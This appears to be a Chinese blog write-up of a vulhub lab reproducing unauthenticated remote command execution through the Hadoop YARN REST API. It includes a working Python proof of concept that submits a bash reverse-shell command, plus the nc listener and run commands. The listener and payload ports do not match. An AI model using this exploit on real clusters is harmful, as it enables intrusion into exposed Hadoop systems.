0
点赞
收藏
分享

微信扫一扫

【vulhub】hadoop

慕容冲_a4b8 2022-05-02 阅读 59
hadoop安全

0x00 unauthorized-yarn(未授权访问)

1、简介

由于服务器直接在开放了 Hadoop 机器 HDFS 的 50070 web 端口及部分默认服务端口,黑客可以通过命令行操作多个目录下的数据,如进行删除,下载,目录浏览甚至命令执行等操作,产生极大的危害。主要 HDFS 和 MapReduce 的 WebUI 对应的服务端口。

其中比较重要的是 DataNode 默认端口 50075 开放的话,攻击者可以通过 hdsf 提供的 restful api 对 hdfs 存储数据进行操作。
————————————————
https://blog.csdn.net/weixin_43061533/article/details/111219083

2、影响版本

3.3.0 以下

3、搭建

4、复现

poc:

#!/usr/bin/env python

import requests

import sys

target = 'http://172.17.0.1:8088'#目标机ip

lhost = '192.168.124.9' ##将你的本地ip填在这里,使用nc监听4444端口

target = sys.argv[1]

#lhost = sys.argv[2]

url = target + '/ws/v1/cluster/apps/new-application'

resp = requests.post(url)

app_id = resp.json()['application-id']

url = target + '/ws/v1/cluster/apps'

data = {

    'application-id': app_id,

    'application-name': 'get-shell',

    'am-container-spec': {

        'commands': {

            'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost,

        },

    },

    'application-type': 'YARN',

}

requests.post(url, json=data)

sudo nc -lvvp 4444#在攻击机上用NC工具开启4444侦听端口 sudo python3 hadoop.py http://kali ip:8088 #执行poc

成功反弹Shell

 

 

举报

相关推荐

vulhub漏洞复现25_Hadoop

【vulhub】conference

vulhub部署

[vulhub]shiro

【vulhub】django

vulhub thales:1 靶场

Ubuntu安装Vulhub靶场

Docker搭建Vulhub靶场

0 条评论